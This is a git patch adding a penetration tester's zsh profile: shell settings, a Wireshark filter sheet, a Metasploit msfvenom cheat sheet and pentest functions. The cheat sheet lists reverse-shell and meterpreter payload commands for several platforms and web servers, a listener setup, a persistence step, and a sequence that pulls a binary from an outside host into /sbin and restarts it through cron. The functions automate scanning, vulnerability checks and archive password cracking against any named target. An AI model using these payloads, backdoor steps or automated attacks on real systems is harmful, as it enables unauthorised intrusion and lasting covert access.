From 0fd2b3df2fdd49c09951f2c0c1d0663547296b85 Mon Sep 17 00:00:00 2001 From: user Date: Thu, 12 Jan 2017 20:41:16 +0100 Subject: [PATCH] anti-chaos update, test version --- .README.md.un~ | Bin 0 -> 2618 bytes LICENSE | 0 README.md | 42 ++++ README.md~ | 43 ++++ profile_files/.nanorc | 6 + .../v3das/metasploit_msfvenom_cheatsheet.txt | 126 +++++++++++ .../.ptz/v3das/network_sniffing_wireshark.txt | 37 ++++ profile_files/.vimrc | 4 + profile_files/.zsh/.pentest_functions.zsh.swp | Bin 0 -> 20480 bytes profile_files/.zsh/agro_detection_parser.py | 10 + profile_files/.zsh/aliases.zsh | 2 + profile_files/.zsh/bindkeys.zsh | 13 ++ profile_files/.zsh/colors.zsh | 17 ++ profile_files/.zsh/completion.zsh | 2 + profile_files/.zsh/general_functions.zsh | 22 ++ profile_files/.zsh/history.zsh | 1 + profile_files/.zsh/pentest_functions.zsh | 200 ++++++++++++++++++ profile_files/.zsh/prompt.zsh | 37 ++++ profile_files/.zsh/setopt.zsh | 4 + profile_files/.zshrc | 14 ++ 20 files changed, 580 insertions(+) create mode 100755 .README.md.un~ mode change 100644 => 100755 LICENSE mode change 100644 => 100755 README.md create mode 100755 README.md~ create mode 100644 profile_files/.nanorc create mode 100644 profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt create mode 100644 profile_files/.ptz/v3das/network_sniffing_wireshark.txt create mode 100644 profile_files/.vimrc create mode 100644 profile_files/.zsh/.pentest_functions.zsh.swp create mode 100644 profile_files/.zsh/agro_detection_parser.py create mode 100644 profile_files/.zsh/aliases.zsh create mode 100644 profile_files/.zsh/bindkeys.zsh create mode 100644 profile_files/.zsh/colors.zsh create mode 100644 profile_files/.zsh/completion.zsh create mode 100644 profile_files/.zsh/general_functions.zsh create mode 100644 profile_files/.zsh/history.zsh create mode 100644 profile_files/.zsh/pentest_functions.zsh create mode 100644 profile_files/.zsh/prompt.zsh create mode 100644 profile_files/.zsh/setopt.zsh create mode 100644 profile_files/.zshrc diff --git a/.README.md.un~ b/.README.md.un~ new file mode 100755 index 0000000000000000000000000000000000000000..2827690fe8e010b009773dbc706a1397a57935ec GIT binary patch literal 2618 zcmWH`%$*;a=aT=FfyvU)L|(ouJ7(Y1kX<&B)+^r}4Y%ypaR6L*@m&0m>;fk7LH zJrt0DYeiyiK~AbdT7Hp2ZfQULbY{Vn!fl1!52Y(J;&qQGRM zqksk>0E~`0aC9&*e3by2&ke+&I0U5&P*hkVB@G4Sv{9Uymkv)ENC^X$8VpSv!SM?+ zgc*oo02J4-L^2w`uu!2H4UFH($nguxT6{nZi(jhceQ0!pqL&59H=w8oMYjn^Y&1KA zLV*GRiaiIYeh}LL$}WSkfzdr1Uv!(|%Fg(TdL?Mwg5nZZrh_a7#WN^wT|k`CxCMm* z1%Q~iU5PJly~v5%JcGQ{3PZi*{9FYv(+I?bML2Rs2KfvW`Jf251aU?q925!^0AeD1 Z4LHIXA$2oI19I8zO^pcGg~j;uRRDax#9sga literal 0 HcmV?d00001 diff --git a/LICENSE b/LICENSE old mode 100644 new mode 100755 diff --git a/README.md b/README.md old mode 100644 new mode 100755 index 447769d..7e6fcef --- a/README.md +++ b/README.md @@ -1 +1,43 @@ Penetration Tester's Zsh - functions 4 fast pawn + +Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. + +Installing after you have the dependencies: cp profile_files/.* -R ~/ + + +Functions +========= + +pawnpls - Automatically enumerate and start predefined attacks such as brute force. + Example for single target: autopawn n0nexi-stent.com + Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com" + + +everythingworksornot\? - check if everything works or not for this script + + +chk functions +============= + +chkhttpz - HTTP response check + Example: chkhttpz itsec.lu 443 + +chkcrt - SSL certificate dump + Example: chkcrt gentoo.org 443 + + +cracking functions +================== + +johnzip - Crack zip files using john + Example: johnzip data.zip rockyou.txt + +johnrar - Crack rar files using john + Example: johnrar data.rar rockyou.txt + + +help functions +============== + +hlp - Get help of the hlp command +hlprnd - Get random strings (lengths: 8,16,32,64) diff --git a/README.md~ b/README.md~ new file mode 100755 index 0000000..65aaaac --- /dev/null +++ b/README.md~ @@ -0,0 +1,43 @@ +Penetration Tester's Zsh - functions 4 fast pawn + +Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. + +Installing after you have the dependencies: cp profile_files/.* -R ~/ + + +Functions +========= + +pawnpls - Automatically enumerate and start predefined attacks such as brute force. + Example for single target: autopawn 127.0.0.1 + Example for multiple targets: autopawn "127.0.0.1 127.0.0.2" + + +everythingworksornot\? - check if everything works or not for this script + + +chk functions +============= + +chkhttpz - HTTP response check + Example: chkhttpz itsec.lu 443 + +chkcrt - SSL certificate dump + Example: chkcrt gentoo.org 443 + + +cracking functions +================== + +johnzip - Crack zip files using john + Example: johnzip data.zip rockyou.txt + +johnrar - Crack rar files using john + Example: johnrar data.rar rockyou.txt + + +help functions +============== + +hlp - Get help of the hlp command +hlprnd - Get random strings (lengths: 8,16,32,64) diff --git a/profile_files/.nanorc b/profile_files/.nanorc new file mode 100644 index 0000000..be95edc --- /dev/null +++ b/profile_files/.nanorc @@ -0,0 +1,6 @@ +set linenumbers +set brackets ""')>]}" +set matchbrackets "(<[{)>]}" +set nohelp +set mouse +set smooth diff --git a/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt b/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt new file mode 100644 index 0000000..95c6d72 --- /dev/null +++ b/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt @@ -0,0 +1,126 @@ +C0nn3ctz msfvenom payload backdoor veil + +List payloads +msfvenom -l + +# The script way to make life more simple +theip=0.0.0.0 +theport=443 + + +Binaries and libs +================= + +Linux +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf +msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf + +Windows +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe +msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf +msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED +msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll +msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll +msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport + +Mac +msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho + + + +Web Payloads +============ + +PHP +msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php +cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php + +ASP +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp + +JSP +msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp + +WAR +msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war + +JavaScript +msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le + + + +Scripting Payloads +================== + +Python +msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py + +Bash +msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh + +Perl +msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl # For Linux +msfvenom -p cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl # For Windows + + + +Shellcode +========= + +For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. + +Linux Based Shellcode +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f + +Windows Based Shellcode +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f +msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c +msfvenom -p windows/shell/bind_tcp -f perl --smallest # Default port is 4444 and with --smallest msfvenom tries to make it small + +Mac Based Shellcode +msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f + + + +Handler +======= + +Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. + +use exploit/multi/handler +set PAYLOAD cmd/windows/powershell_reverse_tcp +set LHOST 0.0.0.0 +set LPORT 443 +set ExitOnSession false +exploit -j -z + +Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ + + + +Persistence +=========== +meterpreter > run persistence + + + +UUID Payload +============ + +# Create payload +msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat + +# Setup msf listener +set payload linux/x86/meterpreter/reverse_tcp_uuid +set payloadUUIDName HAXHAXHAXHAX +set PayloadUUIDTracking true +run -j  + +# Move to vict +cat hipchat.elf |ncat --ssl -lvp 53 +nc --ssl domainzz.com 53 > /sbin/lister +chmod +x /sbin/lister + +# crontab alternatively: +if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi + diff --git a/profile_files/.ptz/v3das/network_sniffing_wireshark.txt b/profile_files/.ptz/v3das/network_sniffing_wireshark.txt new file mode 100644 index 0000000..006832d --- /dev/null +++ b/profile_files/.ptz/v3das/network_sniffing_wireshark.txt @@ -0,0 +1,37 @@ +C0nn3ctz sniffing wireshark network + +IP address +ip.addr == 192.168.1.1 +ip.src == 192.168.1.1 +ip.dst == 192.168.1.1 + +Show only tcp port 110 +tcp.port eq 110 + +Show only tcp and udp port 110 +tcp.port eq 110 || udp.port eq 110 + +Follow TCP stream +tcp.stream eq 0 + +Show only TCP +tcp + +Show only ARP +arp + +Show only HTTP +http + +Show only HTTP or ARP +http||arp + + +HTTP and ip.src +http&&ip.src==192.168.1.4 + +HTTP POST +http:.request.method == "POST" + +etc +(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4) diff --git a/profile_files/.vimrc b/profile_files/.vimrc new file mode 100644 index 0000000..afdae4e --- /dev/null +++ b/profile_files/.vimrc @@ -0,0 +1,4 @@ +syntax on +set nu +set backspace=indent,eol,start +set tabstop=4 shiftwidth=4 expandtab diff --git a/profile_files/.zsh/.pentest_functions.zsh.swp b/profile_files/.zsh/.pentest_functions.zsh.swp new file mode 100644 index 0000000000000000000000000000000000000000..a5402f9c84f40fc25812d424db8a1cd9d1d80f2a GIT binary patch literal 20480 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 literal 0 HcmV?d00001 diff --git a/profile_files/.zsh/agro_detection_parser.py b/profile_files/.zsh/agro_detection_parser.py new file mode 100644 index 0000000..021424d --- /dev/null +++ b/profile_files/.zsh/agro_detection_parser.py @@ -0,0 +1,10 @@ +#!/usr/bin/python2.7 + +with open('2_ports_and_service_top1000_on_alive_hosts.out') as f: + curip="" + for curline in f: + if "Nmap scan report for " in curline: + curip=curline + curip=curip[21:] + if "open" in curline: + print curip.strip('\n') + " " + curline.strip('\n') diff --git a/profile_files/.zsh/aliases.zsh b/profile_files/.zsh/aliases.zsh new file mode 100644 index 0000000..a0dd0e2 --- /dev/null +++ b/profile_files/.zsh/aliases.zsh @@ -0,0 +1,2 @@ +alias py='python' +alias pl='perl' diff --git a/profile_files/.zsh/bindkeys.zsh b/profile_files/.zsh/bindkeys.zsh new file mode 100644 index 0000000..3069983 --- /dev/null +++ b/profile_files/.zsh/bindkeys.zsh @@ -0,0 +1,13 @@ +bindkey "^K" kill-whole-line + +bindkey "${terminfo[khome]}" beginning-of-line +bindkey "${terminfo[kend]}" end-of-line +bindkey "\e[3~" delete-char + +bindkey -v +bindkey '^R' history-incremental-search-backward +bindkey '^T' history-incremental-search-backward + +# Jumping with ctrl+arrows +bindkey "^[[1;5C" forward-word +bindkey "^[[1;5D" backward-word diff --git a/profile_files/.zsh/colors.zsh b/profile_files/.zsh/colors.zsh new file mode 100644 index 0000000..8267050 --- /dev/null +++ b/profile_files/.zsh/colors.zsh @@ -0,0 +1,17 @@ +autoload colors; colors + +# The variables are wrapped in %{%}. This should be the case for every variable that does not contain space. +for COLOR in RED GREEN YELLOW BLUE MAGENTA CYAN BLACK WHITE; do + eval PR_$COLOR='%{$fg_no_bold[${(L)COLOR}]%}' + eval PR_BOLD_$COLOR='%{$fg_bold[${(L)COLOR}]%}' +done + +eval RESET='$reset_color' +export PR_RED PR_GREEN PR_YELLOW PR_BLUE PR_WHITE PR_BLACK +export PR_BOLD_RED PR_BOLD_GREEN PR_BOLD_YELLOW PR_BOLD_BLUE +export PR_BOLD_WHITE PR_BOLD_BLACK + +# Clear LSCOLORS +unset LSCOLORS +export CLICOLOR=1 +export LS_COLORS=exfxcxdxbxegedabagacad diff --git a/profile_files/.zsh/completion.zsh b/profile_files/.zsh/completion.zsh new file mode 100644 index 0000000..6fe6d5f --- /dev/null +++ b/profile_files/.zsh/completion.zsh @@ -0,0 +1,2 @@ +autoload -U compinit && compinit +zmodload -i zsh/complist diff --git a/profile_files/.zsh/general_functions.zsh b/profile_files/.zsh/general_functions.zsh new file mode 100644 index 0000000..febd4bd --- /dev/null +++ b/profile_files/.zsh/general_functions.zsh @@ -0,0 +1,22 @@ +function extract { + echo Running extract on $1 ... + if [ -f $1 ] ; then + case $1 in + *.tar.bz2) tar xjf $1 ;; + *.tar.gz) tar xzf $1 ;; + *.bz2) bunzip2 $1 ;; + *.rar) unrar x $1 ;; + *.gz) gunzip $1 ;; + *.tar) tar xf $1 ;; + *.tbz2) tar xjf $1 ;; + *.tgz) tar xzf $1 ;; + *.zip) unzip $1 ;; + *.Z) uncompress $1 ;; + *.7z) 7z x $1 ;; + *.xz) unxz $1 ;; + *) echo "'$1' cannot be extracted via extract()" ;; + esac + else + echo "'$1' is not a valid file" + fi +} diff --git a/profile_files/.zsh/history.zsh b/profile_files/.zsh/history.zsh new file mode 100644 index 0000000..1e38ca6 --- /dev/null +++ b/profile_files/.zsh/history.zsh @@ -0,0 +1 @@ +# Not saving history by default diff --git a/profile_files/.zsh/pentest_functions.zsh b/profile_files/.zsh/pentest_functions.zsh new file mode 100644 index 0000000..86f549d --- /dev/null +++ b/profile_files/.zsh/pentest_functions.zsh @@ -0,0 +1,200 @@ +function everythingworksornot"?" { + echo "really?" +} + +function ton { + . torsocks on +} + +function tof { + . torsocks off +} + + +function chkhttpz { + echo "HTTP responses" + wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/" + + echo "\nHTTPS responses" + wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/" +} + + +function chkcrt { + openssl s_client -showcerts -connect $1:$2 +} + + +function hlp { + echo "You can get help from the following topics:" + for f in ~/.ptz/v3das/* ; do + echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1 + done +} + +function hlprnd { + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-64};echo; +} + + +function johnzip { + if [ $# -ne 2 ] + then + echo "Usage $0 " + return + fi + + echo "Unzip test..." + unzip -l $1 + + echo "Cracking...." + for i in $(john --wordlist=$2 --rules --stdout) + do + echo -ne "\rtrying \"$i\" " + unzip -o -P $i $1 >/dev/null 2>&1 + STATUS=$? + if [ $STATUS -eq 0 ]; then + echo -e "\nArchive password is: \"$i\"" + return + fi + done +} + + +function johnrar { + if [ $# -ne 2 ] + then + echo "Usage $0 " + else + rar l $1 + echo "Cracking...." + john --wordlist=$2 --rules --stdout | while read i + do + echo -ne "\rtrying \"$i\" " + rar e -o+ -inul -p$i $1 >/dev/null + STATUS=$? + if [ $STATUS -eq "0" ]; then + echo -e "\nArchive password is: \"$i\"" + return + fi + done + fi +} + + + +function pawnpls { + amir00t=$(whoami) + if [ "$amir00t" != "root" ] + then + echo "pawnpls needs root in order to be effective (eg. for nmap -sS scans)." + return + fi + + if [ $# -ne 1 ] + then + echo "Are you sure? You need to specify a target. Be careful. This runs out of tor also, even if you have torsocks ;)" + return + fi + + # Pass to the scan function, no active attacks, just scanning + pawnpls_tof_target=$1 + dns_enum_tof + scan_enum_tof + active_attack_tof + +} + + +function dns_enum_tof { + + . torsocks off + + dnstarg=($pawnpls_tof_target) + + cdate=$(date +"%Y-%m-%d-%H%M") + dettmpfold="~/.ptz/result-scan-$cdate" + mkdir -p $sctmpfold + cd $sctmpfold + + theharvester -d $pawnpls_tof_target -b all -v > 1_harvester_$pawnpls_tof_target.txt + +} + +function scan_enum_tof { + + . torsocks off + + # Variables + targetx=($pawnpls_tof_target) # Space delimited! + ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211) + + # Initialize directory and naming structure + cdate=$(date +"%Y-%m-%d-%H%M") + sctmpfold="~/.ptz/result-scan-$cdate" + mkdir -p $sctmpfold + cd $sctmpfold + + touch scan_history.txt + + echo "---- Starting AgroScanner ----" >> scan_history.txt + + # Start with standard alive scan and check ports on alive hosts + # Get alive hosts + echo "Starting alive host enumeration..." + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt + nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out + alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ') + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt + + echo "Starting port scans on alive hosts..." + # Port scanning on alive hosts and version detection + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt + nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out + python ~/.zsh/agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out + number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this. + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt + # Run UDP scan on most common ports + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt + nmap -sU --top-ports 50 $targetx > 4_udpscan.out + number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l) + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt + + echo "Starting nmap nse vulnerability scanning..." + # Vulnerability scanning + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt + nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt + nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something + nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt + + echo $(date +"%Y-%m-%d-%H-%M-%S") " Started scan for automatic searchsploit." >> scan_history.txt + # for searchsploit, but nmap should be configured to scan with xml, default is top 1000 + nmap -sS -sV -sC -O --host-timeout=5m --max-hostgroup=1 -Pn $targetx -oA 8_nmap_for_searchsploit + searchsploit -v --nmap 8_nmap_for_searchsploit.xml > 9_searchslpoit_results.txt + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished the searchsploit queries. Outputs are in the relevant files." >> scan_history.txt + +} + +function active_attack_tof { + + . torsocks off + + cdate=$(date +"%Y-%m-%d-%H%M") + aatmpfold="~/.ptz/result-attack-$cdate" + mkdir -p $aatmpfold + cd $aatmpfold + + + # Preconfs + hydrabruteprotocol=(cvs firebird icq irc ldap nntp oracle-listener oracle-sid pcanywhere pcnfs postgres rdp redis rtsp ssh sip teamspeak vmauthd) + usernames="/usr/share/nmap/nselib/data/usernames.lst" + passwords="/usr/share/nmap/nselib/data/passwords.lst" + + + + +} diff --git a/profile_files/.zsh/prompt.zsh b/profile_files/.zsh/prompt.zsh new file mode 100644 index 0000000..fc35679 --- /dev/null +++ b/profile_files/.zsh/prompt.zsh @@ -0,0 +1,37 @@ +function git_prompt_info { + local ref=$(=git symbolic-ref HEAD 2> /dev/null) + local gitst="$(=git status 2> /dev/null)" + + if [[ -f .git/MERGE_HEAD ]]; then + if [[ ${gitst} =~ "unmerged" ]]; then + gitstatus=" %{$fg[red]%}unmerged%{$reset_color%}" + else + gitstatus=" %{$fg[green]%}merged%{$reset_color%}" + fi + elif [[ ${gitst} =~ "Changes to be committed" ]]; then + gitstatus=" %{$fg[blue]%}!%{$reset_color%}" + elif [[ ${gitst} =~ "use \"git add" ]]; then + gitstatus=" %{$fg[red]%}!%{$reset_color%}" + elif [[ -n `git checkout HEAD 2> /dev/null | grep ahead` ]]; then + gitstatus=" %{$fg[yellow]%}*%{$reset_color%}" + else + gitstatus='' + fi + + if [[ -n $ref ]]; then + echo "%{$fg_bold[green]%}/${ref#refs/heads/}%{$reset_color%}$gitstatus" + fi +} + +function trso { + trsochk=$(/usr/bin/torsocks show|grep libtorsocks.so) + if [[ -z $(/usr/bin/torsocks show|grep libtorsocks.so) ]] + then + trchkres="%{$fg[yellow]%}tof" + else + trchkres="%{$fg[red]%}ton" + fi + echo $trchkres +} + +PROMPT='%{$fg[red]%}$(whoami)%{$reset_color%}.ptz $(trso)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} ' diff --git a/profile_files/.zsh/setopt.zsh b/profile_files/.zsh/setopt.zsh new file mode 100644 index 0000000..4b865a7 --- /dev/null +++ b/profile_files/.zsh/setopt.zsh @@ -0,0 +1,4 @@ +setopt AUTO_CD +setopt COMPLETE_IN_WORD +setopt ALWAYS_TO_END +setopt PROMPT_SUBST diff --git a/profile_files/.zshrc b/profile_files/.zshrc new file mode 100644 index 0000000..45b0ff2 --- /dev/null +++ b/profile_files/.zshrc @@ -0,0 +1,14 @@ +source ~/.zsh/colors.zsh +source ~/.zsh/setopt.zsh +source ~/.zsh/prompt.zsh +source ~/.zsh/completion.zsh +source ~/.zsh/aliases.zsh +source ~/.zsh/bindkeys.zsh +source ~/.zsh/functions.zsh +source ~/.zsh/general_functions.zsh +source ~/.zsh/pentest_functions.zsh +source ~/.zsh/history.zsh + +zstyle ':completion:*' menu select + +. torsocks on